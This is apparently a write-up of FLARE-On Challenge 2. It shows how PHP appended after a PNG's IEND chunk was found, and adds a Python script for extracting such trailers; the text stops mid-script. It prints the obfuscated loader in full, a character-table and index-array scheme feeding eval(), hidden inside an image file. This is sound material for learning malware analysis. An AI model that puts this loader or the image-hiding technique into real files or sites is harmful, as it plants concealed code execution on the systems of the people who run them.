The-FLARE-On-Challenge-01/Challenge-2
Uncompress the archive
You can get the file from following location: http://www.flare-on.com/files/C2.zip
Let's uncompress the archive (password is "malware"):
$ 7z x C2.zip

7-Zip [64] 9.20  Copyright (c) 1999-2010 Igor Pavlov  2010-11-18
p7zip Version 9.20 (locale=fr_FR.utf8,Utf16=on,HugeFiles=on,4 CPUs)

Processing archive: C2.zip

Extracting  home.html
Enter password (will not be echoed) : malware
Extracting  img
Extracting  img/flare-on.png

Everything is Ok

Folders: 1
Files: 2
Size:       17935
Compressed: 10758
It results in 2 files as follows:
.
├── home.html (MD5: d16db814c05dd9619fec6944aa4590da)
└── img
    └── flare-on.png (MD5: 45d147b3e6c573a608a5c2138f1f5e0d)
What does it look like?
When we open home.html in our browser, it looks like this:
Extract PHP code from the image
The HTML itself (home.html) contains nothing of interest, but the image (img/flare-on.png) has PHP appended after its IEND chunk: the "<?php" tag starts at offset 0x19c4, immediately after the IEND CRC (ae 42 60 82). PNG decoders stop reading at IEND, so the image still renders normally and the trailing code goes unnoticed by anyone who only looks at the picture:
$ hd flare-on.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 01 90 00 00 00 4f  08 06 00 00 00 c5 a0 93  |.......O........|
00000020  82 00 00 00 01 73 52 47  42 00 ae ce 1c e9 00 00  |.....sRGB.......|
00000030  00 04 67 41 4d 41 00 00  b1 8f 0b fc 61 05 00 00  |..gAMA......a...|
00000040  00 09 70 48 59 73 00 00  12 74 00 00 12 74 01 de  |..pHYs...t...t..|
00000050  66 1f 78 00 00 00 19 74  45 58 74 53 6f 66 74 77  |f.x....tEXtSoftw|
00000060  61 72 65 00 41 64 6f 62  65 20 49 6d 61 67 65 52  |are.Adobe ImageR|
00000070  65 61 64 79 71 c9 65 3c  00 00 19 34 49 44 41 54  |eadyq.e<...4IDAT|
00000080  78 5e ed 9d 07 78 15 45  d7 c7 87 1a 42 4b 02 a1  |x^...x.E....BK..|
00000090  77 50 29 36 40 45 a4 06  04 44 e9 0a 88 28 28 2a  |wP)6@E...D...((*|
000000a0  b1 d1 5e 3a 48 17 21 58  90 22 1f 12 15 51 51 5f  |..^:H.!X."...QQ_|
000000b0  5a 2c 28 82 f4 22 58 e8  45 6c 20 08 4a 10 e9 89  |Z,(.."X.El .J...|
[SNIP]
000019c0  ae 42 60 82 3c 3f 70 68  70 20 24 74 65 72 6d 73  |.B`.<?php $terms|
000019d0  3d 61 72 72 61 79 28 22  4d 22 2c 20 22 5a 22 2c  |=array("M", "Z",|
000019e0  20 22 5d 22 2c 20 22 70  22 2c 20 22 5c 5c 22 2c  | "]", "p", "\\",|
000019f0  20 22 77 22 2c 20 22 66  22 2c 20 22 31 22 2c 20  | "w", "f", "1", |
00001a00  22 76 22 2c 20 22 3c 22  2c 20 22 61 22 2c 20 22  |"v", "<", "a", "|
00001a10  51 22 2c 20 22 7a 22 2c  20 22 20 22 2c 20 22 73  |Q", "z", " ", "s|
00001a20  22 2c 20 22 6d 22 2c 20  22 2b 22 2c 20 22 45 22  |", "m", "+", "E"|
00001a30  2c 20 22 44 22 2c 20 22  67 22 2c 20 22 57 22 2c  |, "D", "g", "W",|
00001a40  20 22 5c 22 22 2c 20 22  71 22 2c 20 22 79 22 2c  | "\"", "q", "y",|
00001a50  20 22 54 22 2c 20 22 56  22 2c 20 22 6e 22 2c 20  | "T", "V", "n", |
00001a60  22 53 22 2c 20 22 58 22  2c 20 22 29 22 2c 20 22  |"S", "X", ")", "|
00001a70  39 22 2c 20 22 43 22 2c  20 22 50 22 2c 20 22 72  |9", "C", "P", "r|
00001a80  22 2c 20 22 26 22 2c 20  22 5c 27 22 2c 20 22 21  |", "&", "\'", "!|
00001a90  22 2c 20 22 78 22 2c 20  22 47 22 2c 20 22 3a 22  |", "x", "G", ":"|
00001aa0  2c 20 22 32 22 2c 20 22  7e 22 2c 20 22 4f 22 2c  |, "2", "~", "O",|
00001ab0  20 22 68 22 2c 20 22 75  22 2c 20 22 55 22 2c 20  | "h", "u", "U", |
00001ac0  22 40 22 2c 20 22 3b 22  2c 20 22 48 22 2c 20 22  |"@", ";", "H", "|
00001ad0  33 22 2c 20 22 46 22 2c  20 22 36 22 2c 20 22 62  |3", "F", "6", "b|
00001ae0  22 2c 20 22 4c 22 2c 20  22 3e 22 2c 20 22 5e 22  |", "L", ">", "^"|
00001af0  2c 20 22 2c 22 2c 20 22  2e 22 2c 20 22 6c 22 2c  |, ",", ".", "l",|
00001b00  20 22 24 22 2c 20 22 64  22 2c 20 22 60 22 2c 20  | "$", "d", "`", |
00001b10  22 25 22 2c 20 22 4e 22  2c 20 22 2a 22 2c 20 22  |"%", "N", "*", "|
00001b20  5b 22 2c 20 22 30 22 2c  20 22 7d 22 2c 20 22 4a  |[", "0", "}", "J|
00001b30  22 2c 20 22 2d 22 2c 20  22 35 22 2c 20 22 5f 22  |", "-", "5", "_"|
00001b40  2c 20 22 41 22 2c 20 22  3d 22 2c 20 22 7b 22 2c  |, "A", "=", "{",|
00001b50  20 22 6b 22 2c 20 22 6f  22 2c 20 22 37 22 2c 20  | "k", "o", "7", |
00001b60  22 23 22 2c 20 22 69 22  2c 20 22 49 22 2c 20 22  |"#", "i", "I", "|
00001b70  59 22 2c 20 22 28 22 2c  20 22 6a 22 2c 20 22 2f  |Y", "(", "j", "/|
00001b80  22 2c 20 22 3f 22 2c 20  22 4b 22 2c 20 22 63 22  |", "?", "K", "c"|
00001b90  2c 20 22 42 22 2c 20 22  74 22 2c 20 22 52 22 2c  |, "B", "t", "R",|
00001ba0  20 22 34 22 2c 20 22 38  22 2c 20 22 65 22 2c 20  | "4", "8", "e", |
00001bb0  22 7c 22 29 3b 24 6f 72  64 65 72 3d 61 72 72 61  |"|");$order=arra|
00001bc0  79 28 35 39 2c 20 37 31  2c 20 37 33 2c 20 31 33  |y(59, 71, 73, 13|
00001bd0  2c 20 33 35 2c 20 31 30  2c 20 32 30 2c 20 38 31  |, 35, 10, 20, 81|
00001be0  2c 20 37 36 2c 20 31 30  2c 20 32 38 2c 20 36 33  |, 76, 10, 28, 63|
00001bf0  2c 20 31 32 2c 20 31 2c  20 32 38 2c 20 31 31 2c  |, 12, 1, 28, 11,|
00001c00  20 37 36 2c 20 36 38 2c  20 35 30 2c 20 33 30 2c  | 76, 68, 50, 30,|
00001c10  20 31 31 2c 20 32 34 2c  20 37 2c 20 36 33 2c 20  | 11, 24, 7, 63, |
00001c20  34 35 2c 20 32 30 2c 20  32 33 2c 20 36 38 2c 20  |45, 20, 23, 68, |
00001c30  38 37 2c 20 34 32 2c 20  32 34 2c 20 36 30 2c 20  |87, 42, 24, 60, |
00001c40  38 37 2c 20 36 33 2c 20  31 38 2c 20 35 38 2c 20  |87, 63, 18, 58, |
*
00001c60  38 37 2c 20 36 33 2c 20  38 33 2c 20 34 33 2c 20  |87, 63, 83, 43, |
00001c70  38 37 2c 20 39 33 2c 20  31 38 2c 20 39 30 2c 20  |87, 93, 18, 90, |
00001c80  33 38 2c 20 32 38 2c 20  31 38 2c 20 31 39 2c 20  |38, 28, 18, 19, |
00001c90  36 36 2c 20 32 38 2c 20  31 38 2c 20 31 37 2c 20  |66, 28, 18, 17, |
00001ca0  33 37 2c 20 36 33 2c 20  35 38 2c 20 33 37 2c 20  |37, 63, 58, 37, |
00001cb0  39 31 2c 20 36 33 2c 20  38 33 2c 20 34 33 2c 20  |91, 63, 83, 43, |
00001cc0  38 37 2c 20 34 32 2c 20  32 34 2c 20 36 30 2c 20  |87, 42, 24, 60, |
00001cd0  38 37 2c 20 39 33 2c 20  31 38 2c 20 38 37 2c 20  |87, 93, 18, 87, |
00001ce0  36 36 2c 20 32 38 2c 20  34 38 2c 20 31 39 2c 20  |66, 28, 48, 19, |
00001cf0  36 36 2c 20 36 33 2c 20  35 30 2c 20 33 37 2c 20  |66, 63, 50, 37, |
00001d00  39 31 2c 20 36 33 2c 20  31 37 2c 20 31 2c 20 38  |91, 63, 17, 1, 8|
00001d10  37 2c 20 39 33 2c 20 31  38 2c 20 34 35 2c 20 36  |7, 93, 18, 45, 6|
00001d20  36 2c 20 32 38 2c 20 34  38 2c 20 31 39 2c 20 34  |6, 28, 48, 19, 4|
00001d30  30 2c 20 31 31 2c 20 32  35 2c 20 35 2c 20 37 30  |0, 11, 25, 5, 70|
00001d40  2c 20 36 33 2c 20 37 2c  20 33 37 2c 20 39 31 2c  |, 63, 7, 37, 91,|
00001d50  20 36 33 2c 20 31 32 2c  20 31 2c 20 38 37 2c 20  | 63, 12, 1, 87, |
00001d60  39 33 2c 20 31 38 2c 20  38 31 2c 20 33 37 2c 20  |93, 18, 81, 37, |
00001d70  32 38 2c 20 34 38 2c 20  31 39 2c 20 31 32 2c 20  |28, 48, 19, 12, |
00001d80  36 33 2c 20 32 35 2c 20  33 37 2c 20 39 31 2c 20  |63, 25, 37, 91, |
00001d90  36 33 2c 20 38 33 2c 20  36 33 2c 20 38 37 2c 20  |63, 83, 63, 87, |
00001da0  39 33 2c 20 31 38 2c 20  38 37 2c 20 32 33 2c 20  |93, 18, 87, 23, |
00001db0  32 38 2c 20 31 38 2c 20  37 35 2c 20 34 39 2c 20  |28, 18, 75, 49, |
00001dc0  32 38 2c 20 34 38 2c 20  31 39 2c 20 34 39 2c 20  |28, 48, 19, 49, |
00001dd0  30 2c 20 35 30 2c 20 33  37 2c 20 39 31 2c 20 36  |0, 50, 37, 91, 6|
00001de0  33 2c 20 31 38 2c 20 35  30 2c 20 38 37 2c 20 34  |3, 18, 50, 87, 4|
00001df0  32 2c 20 31 38 2c 20 39  30 2c 20 38 37 2c 20 39  |2, 18, 90, 87, 9|
00001e00  33 2c 20 31 38 2c 20 38  31 2c 20 34 30 2c 20 32  |3, 18, 81, 40, 2|
00001e10  38 2c 20 34 38 2c 20 31  39 2c 20 34 30 2c 20 31  |8, 48, 19, 40, 1|
00001e20  31 2c 20 37 2c 20 35 2c  20 37 30 2c 20 36 33 2c  |1, 7, 5, 70, 63,|
00001e30  20 37 2c 20 33 37 2c 20  39 31 2c 20 36 33 2c 20  | 7, 37, 91, 63, |
00001e40  31 32 2c 20 36 38 2c 20  38 37 2c 20 39 33 2c 20  |12, 68, 87, 93, |
00001e50  31 38 2c 20 38 31 2c 20  37 2c 20 32 38 2c 20 34  |18, 81, 7, 28, 4|
00001e60  38 2c 20 31 39 2c 20 36  36 2c 20 36 33 2c 20 35  |8, 19, 66, 63, 5|
00001e70  30 2c 20 35 2c 20 34 30  2c 20 36 33 2c 20 32 35  |0, 5, 40, 63, 25|
00001e80  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 32 34  |, 37, 91, 63, 24|
00001e90  2c 20 36 33 2c 20 38 37  2c 20 36 33 2c 20 31 32  |, 63, 87, 63, 12|
00001ea0  2c 20 36 38 2c 20 38 37  2c 20 30 2c 20 32 34 2c  |, 68, 87, 0, 24,|
00001eb0  20 31 37 2c 20 33 37 2c  20 32 38 2c 20 31 38 2c  | 17, 37, 28, 18,|
00001ec0  20 31 37 2c 20 33 37 2c  20 30 2c 20 35 30 2c 20  | 17, 37, 0, 50, |
00001ed0  35 2c 20 34 30 2c 20 34  32 2c 20 35 30 2c 20 35  |5, 40, 42, 50, 5|
00001ee0  2c 20 34 39 2c 20 34 32  2c 20 32 35 2c 20 35 2c  |, 49, 42, 25, 5,|
00001ef0  20 39 31 2c 20 36 33 2c  20 35 30 2c 20 35 2c 20  | 91, 63, 50, 5, |
00001f00  37 30 2c 20 34 32 2c 20  32 35 2c 20 33 37 2c 20  |70, 42, 25, 37, |
00001f10  39 31 2c 20 36 33 2c 20  37 35 2c 20 31 2c 20 38  |91, 63, 75, 1, 8|
00001f20  37 2c 20 39 33 2c 20 31  38 2c 20 31 2c 20 31 37  |7, 93, 18, 1, 17|
00001f30  2c 20 38 30 2c 20 35 38  2c 20 36 36 2c 20 33 2c  |, 80, 58, 66, 3,|
00001f40  20 38 36 2c 20 32 37 2c  20 38 38 2c 20 37 37 2c  | 86, 27, 88, 77,|
00001f50  20 38 30 2c 20 33 38 2c  20 32 35 2c 20 34 30 2c  | 80, 38, 25, 40,|
00001f60  20 38 31 2c 20 32 30 2c  20 35 2c 20 37 36 2c 20  | 81, 20, 5, 76, |
00001f70  38 31 2c 20 31 35 2c 20  35 30 2c 20 31 32 2c 20  |81, 15, 50, 12, |
00001f80  31 2c 20 32 34 2c 20 38  31 2c 20 36 36 2c 20 32  |1, 24, 81, 66, 2|
00001f90  38 2c 20 34 30 2c 20 39  30 2c 20 35 38 2c 20 38  |8, 40, 90, 58, 8|
00001fa0  31 2c 20 34 30 2c 20 33  30 2c 20 37 35 2c 20 31  |1, 40, 30, 75, 1|
00001fb0  2c 20 32 37 2c 20 31 39  2c 20 37 35 2c 20 32 38  |, 27, 19, 75, 28|
00001fc0  2c 20 37 2c 20 38 38 2c  20 33 32 2c 20 34 35 2c  |, 7, 88, 32, 45,|
00001fd0  20 37 2c 20 39 30 2c 20  35 32 2c 20 38 30 2c 20  | 7, 90, 52, 80, |
00001fe0  35 38 2c 20 35 2c 20 37  30 2c 20 36 33 2c 20 37  |58, 5, 70, 63, 7|
00001ff0  2c 20 35 2c 20 36 36 2c  20 34 32 2c 20 32 35 2c  |, 5, 66, 42, 25,|
00002000  20 33 37 2c 20 39 31 2c  20 30 2c 20 31 32 2c 20  | 37, 91, 0, 12, |
00002010  35 30 2c 20 38 37 2c 20  36 33 2c 20 38 33 2c 20  |50, 87, 63, 83, |
00002020  34 33 2c 20 38 37 2c 20  39 33 2c 20 31 38 2c 20  |43, 87, 93, 18, |
00002030  39 30 2c 20 33 38 2c 20  32 38 2c 20 34 38 2c 20  |90, 38, 28, 48, |
00002040  31 39 2c 20 37 2c 20 36  33 2c 20 35 30 2c 20 35  |19, 7, 63, 50, 5|
00002050  2c 20 33 37 2c 20 30 2c  20 32 34 2c 20 31 2c 20  |, 37, 0, 24, 1, |
00002060  38 37 2c 20 30 2c 20 32  34 2c 20 37 32 2c 20 36  |87, 0, 24, 72, 6|
00002070  36 2c 20 32 38 2c 20 34  38 2c 20 31 39 2c 20 34  |6, 28, 48, 19, 4|
00002080  30 2c 20 30 2c 20 32 35  2c 20 35 2c 20 33 37 2c  |0, 0, 25, 5, 37,|
00002090  20 30 2c 20 32 34 2c 20  31 2c 20 38 37 2c 20 39  | 0, 24, 1, 87, 9|
000020a0  33 2c 20 31 38 2c 20 31  31 2c 20 36 36 2c 20 32  |3, 18, 11, 66, 2|
000020b0  38 2c 20 31 38 2c 20 38  37 2c 20 37 30 2c 20 32  |8, 18, 87, 70, 2|
000020c0  38 2c 20 34 38 2c 20 31  39 2c 20 37 2c 20 36 33  |8, 48, 19, 7, 63|
000020d0  2c 20 35 30 2c 20 35 2c  20 33 37 2c 20 30 2c 20  |, 50, 5, 37, 0, |
000020e0  31 38 2c 20 31 2c 20 38  37 2c 20 34 32 2c 20 32  |18, 1, 87, 42, 2|
000020f0  34 2c 20 36 30 2c 20 38  37 2c 20 30 2c 20 32 34  |4, 60, 87, 0, 24|
00002100  2c 20 31 37 2c 20 39 31  2c 20 32 38 2c 20 31 38  |, 17, 91, 28, 18|
00002110  2c 20 37 35 2c 20 34 39  2c 20 32 38 2c 20 31 38  |, 75, 49, 28, 18|
00002120  2c 20 34 35 2c 20 31 32  2c 20 32 38 2c 20 34 38  |, 45, 12, 28, 48|
00002130  2c 20 31 39 2c 20 34 30  2c 20 30 2c 20 37 2c 20  |, 19, 40, 0, 7, |
00002140  35 2c 20 33 37 2c 20 30  2c 20 32 34 2c 20 39 30  |5, 37, 0, 24, 90|
00002150  2c 20 38 37 2c 20 39 33  2c 20 31 38 2c 20 38 31  |, 87, 93, 18, 81|
00002160  2c 20 33 37 2c 20 32 38  2c 20 34 38 2c 20 31 39  |, 37, 28, 48, 19|
00002170  2c 20 34 39 2c 20 30 2c  20 35 30 2c 20 35 2c 20  |, 49, 0, 50, 5, |
00002180  34 30 2c 20 36 33 2c 20  32 35 2c 20 35 2c 20 39  |40, 63, 25, 5, 9|
00002190  31 2c 20 36 33 2c 20 35  30 2c 20 35 2c 20 33 37  |1, 63, 50, 5, 37|
000021a0  2c 20 30 2c 20 31 38 2c  20 36 38 2c 20 38 37 2c  |, 0, 18, 68, 87,|
000021b0  20 39 33 2c 20 31 38 2c  20 31 2c 20 31 38 2c 20  | 93, 18, 1, 18, |
000021c0  32 38 2c 20 34 38 2c 20  31 39 2c 20 34 30 2c 20  |28, 48, 19, 40, |
000021d0  30 2c 20 32 35 2c 20 35  2c 20 33 37 2c 20 30 2c  |0, 25, 5, 37, 0,|
000021e0  20 32 34 2c 20 39 30 2c  20 38 37 2c 20 30 2c 20  | 24, 90, 87, 0, |
000021f0  32 34 2c 20 37 32 2c 20  33 37 2c 20 32 38 2c 20  |24, 72, 37, 28, |
00002200  34 38 2c 20 31 39 2c 20  36 36 2c 20 36 33 2c 20  |48, 19, 66, 63, |
00002210  35 30 2c 20 35 2c 20 34  30 2c 20 36 33 2c 20 32  |50, 5, 40, 63, 2|
00002220  35 2c 20 33 37 2c 20 39  31 2c 20 36 33 2c 20 32  |5, 37, 91, 63, 2|
00002230  34 2c 20 36 33 2c 20 38  37 2c 20 36 33 2c 20 31  |4, 63, 87, 63, 1|
00002240  32 2c 20 36 38 2c 20 38  37 2c 20 30 2c 20 32 34  |2, 68, 87, 0, 24|
00002250  2c 20 31 37 2c 20 33 37  2c 20 32 38 2c 20 34 38  |, 17, 37, 28, 48|
00002260  2c 20 31 39 2c 20 34 30  2c 20 39 30 2c 20 32 35  |, 19, 40, 90, 25|
00002270  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 31 38  |, 37, 91, 63, 18|
00002280  2c 20 39 30 2c 20 38 37  2c 20 39 33 2c 20 31 38  |, 90, 87, 93, 18|
00002290  2c 20 39 30 2c 20 33 38  2c 20 32 38 2c 20 31 38  |, 90, 38, 28, 18|
000022a0  2c 20 31 39 2c 20 36 36  2c 20 32 38 2c 20 31 38  |, 19, 66, 28, 18|
000022b0  2c 20 37 35 2c 20 37 30  2c 20 32 38 2c 20 34 38  |, 75, 70, 28, 48|
000022c0  2c 20 31 39 2c 20 34 30  2c 20 39 30 2c 20 35 38  |, 19, 40, 90, 58|
000022d0  2c 20 33 37 2c 20 39 31  2c 20 36 33 2c 20 37 35  |, 37, 91, 63, 75|
000022e0  2c 20 31 31 2c 20 37 39  2c 20 32 38 2c 20 32 37  |, 11, 79, 28, 27|
000022f0  2c 20 37 35 2c 20 33 2c  20 34 32 2c 20 32 33 2c  |, 75, 3, 42, 23,|
00002300  20 38 38 2c 20 33 30 2c  20 33 35 2c 20 34 37 2c  | 88, 30, 35, 47,|
00002310  20 35 39 2c 20 37 31 2c  20 37 31 2c 20 37 33 2c  | 59, 71, 71, 73,|
00002320  20 33 35 2c 20 36 38 2c  20 33 38 2c 20 36 33 2c  | 35, 68, 38, 63,|
00002330  20 38 2c 20 31 2c 20 33  38 2c 20 34 35 2c 20 33  | 8, 1, 38, 45, 3|
00002340  30 2c 20 38 31 2c 20 31  35 2c 20 35 30 2c 20 31  |0, 81, 15, 50, 1|
00002350  32 2c 20 31 2c 20 32 34  2c 20 38 31 2c 20 36 36  |2, 1, 24, 81, 66|
00002360  2c 20 32 38 2c 20 34 30  2c 20 39 30 2c 20 35 38  |, 28, 40, 90, 58|
00002370  2c 20 38 31 2c 20 34 30  2c 20 33 30 2c 20 37 35  |, 81, 40, 30, 75|
00002380  2c 20 31 2c 20 32 37 2c  20 31 39 2c 20 37 35 2c  |, 1, 27, 19, 75,|
00002390  20 32 38 2c 20 32 33 2c  20 37 35 2c 20 37 37 2c  | 28, 23, 75, 77,|
000023a0  20 31 2c 20 32 38 2c 20  31 2c 20 34 33 2c 20 35  | 1, 28, 1, 43, 5|
000023b0  32 2c 20 33 31 2c 20 31  39 2c 20 37 35 2c 20 38  |2, 31, 19, 75, 8|
000023c0  31 2c 20 34 30 2c 20 33  30 2c 20 37 35 2c 20 31  |1, 40, 30, 75, 1|
000023d0  2c 20 32 37 2c 20 37 35  2c 20 37 37 2c 20 33 35  |, 27, 75, 77, 35|
000023e0  2c 20 34 37 2c 20 35 39  2c 20 37 31 2c 20 37 31  |, 47, 59, 71, 71|
000023f0  2c 20 37 31 2c 20 37 33  2c 20 32 31 2c 20 34 2c  |, 71, 73, 21, 4,|
00002400  20 33 37 2c 20 35 31 2c  20 34 30 2c 20 34 2c 20  | 37, 51, 40, 4, |
00002410  37 2c 20 39 31 2c 20 37  2c 20 34 2c 20 33 37 2c  |7, 91, 7, 4, 37,|
00002420  20 37 37 2c 20 34 39 2c  20 34 2c 20 37 2c 20 39  | 77, 49, 4, 7, 9|
00002430  31 2c 20 37 30 2c 20 34  2c 20 33 37 2c 20 34 39  |1, 70, 4, 37, 49|
00002440  2c 20 35 31 2c 20 34 2c  20 35 31 2c 20 39 31 2c  |, 51, 4, 51, 91,|
00002450  20 34 2c 20 33 37 2c 20  37 30 2c 20 36 2c 20 34  | 4, 37, 70, 6, 4|
00002460  2c 20 37 2c 20 39 31 2c  20 39 31 2c 20 34 2c 20  |, 7, 91, 91, 4, |
00002470  33 37 2c 20 35 31 2c 20  37 30 2c 20 34 2c 20 37  |37, 51, 70, 4, 7|
00002480  2c 20 39 31 2c 20 34 39  2c 20 34 2c 20 33 37 2c  |, 91, 49, 4, 37,|
00002490  20 35 31 2c 20 36 2c 20  34 2c 20 37 2c 20 39 31  | 51, 6, 4, 7, 91|
000024a0  2c 20 39 31 2c 20 34 2c  20 33 37 2c 20 35 31 2c  |, 91, 4, 37, 51,|
000024b0  20 37 30 2c 20 32 31 2c  20 34 37 2c 20 39 33 2c  | 70, 21, 47, 93,|
000024c0  20 38 2c 20 31 30 2c 20  35 38 2c 20 38 32 2c 20  | 8, 10, 58, 82, |
000024d0  35 39 2c 20 37 31 2c 20  37 31 2c 20 37 31 2c 20  |59, 71, 71, 71, |
000024e0  38 32 2c 20 35 39 2c 20  37 31 2c 20 37 31 2c 20  |82, 59, 71, 71, |
000024f0  32 39 2c 20 32 39 2c 20  34 37 29 3b 24 64 6f 5f  |29, 29, 47);$do_|
00002500  6d 65 3d 22 22 3b 66 6f  72 28 24 69 3d 30 3b 24  |me="";for($i=0;$|
00002510  69 3c 63 6f 75 6e 74 28  24 6f 72 64 65 72 29 3b  |i<count($order);|
00002520  24 69 2b 2b 29 7b 24 64  6f 5f 6d 65 3d 24 64 6f  |$i++){$do_me=$do|
00002530  5f 6d 65 2e 24 74 65 72  6d 73 5b 24 6f 72 64 65  |_me.$terms[$orde|
00002540  72 5b 24 69 5d 5d 3b 7d  65 76 61 6c 28 24 64 6f  |r[$i]];}eval($do|
00002550  5f 6d 65 29 3b 20 3f 3e                           |_me); ?>|
00002558
Let's extract this PHP code:
<?php
$terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|");
$order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47);
$do_me="";
for($i=0;$i<count($order);$i++){$do_me=$do_me.$terms[$order[$i]];}
eval($do_me);
?>
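To make the "PHP after IEND" observation checkable without reading a hex dump, here is an added Python example (not code from the original write-up). It walks the PNG chunk list, verifies every chunk CRC, reports where the IEND chunk ends and returns whatever follows it, then pulls the <?php ... ?> block out of that trailer. The 1x1 PNG and the short terms/order payload it runs on are constructed inside the script, and the function names are mine. Run against the real flare-on.png it should report the trailer at offset 0x19c4, which is exactly where "<?php" appears in the hexdump above, right after the IEND CRC ae 42 60 82.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def find_png_trailer(data):
    """Walk the chunk list, checking each CRC, and return
    (offset just past the IEND chunk, bytes that follow it).

    A conforming decoder stops at IEND, so anything in the trailer is
    invisible to viewers and browsers but still present in the file.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while True:
        if pos + 12 > len(data):
            raise ValueError("truncated PNG: no IEND chunk found")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length          # 4 length + 4 type + payload + 4 CRC
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk at {pos:#x}")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC for {ctype!r} chunk at {pos:#x}")
        pos = end
        if ctype == b"IEND":
            return pos, data[pos:]


def extract_php(trailer):
    """Return the first <?php ... ?> block in the trailer, or None."""
    m = re.search(rb"<\?php.*?\?>", trailer, re.DOTALL)
    return m.group(0).decode("latin-1") if m else None


def make_png_1x1():
    """Constructed sample: a valid 1x1 opaque-black RGBA PNG."""
    def chunk(ctype, payload):
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0)   # width, height, depth, RGBA
    scanline = b"\x00" + b"\x00\x00\x00\xff"             # filter 0 + one pixel
    return (PNG_SIGNATURE + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(scanline)) + chunk(b"IEND", b""))


# Constructed payload in the same shape as the challenge's (terms/order/eval).
PAYLOAD = (b'<?php $terms=array("e","c","h","o"," ","1",";");'
           b'$order=array(0,1,2,3,4,5,6);$do_me="";'
           b'for($i=0;$i<count($order);$i++){$do_me=$do_me.$terms[$order[$i]];}'
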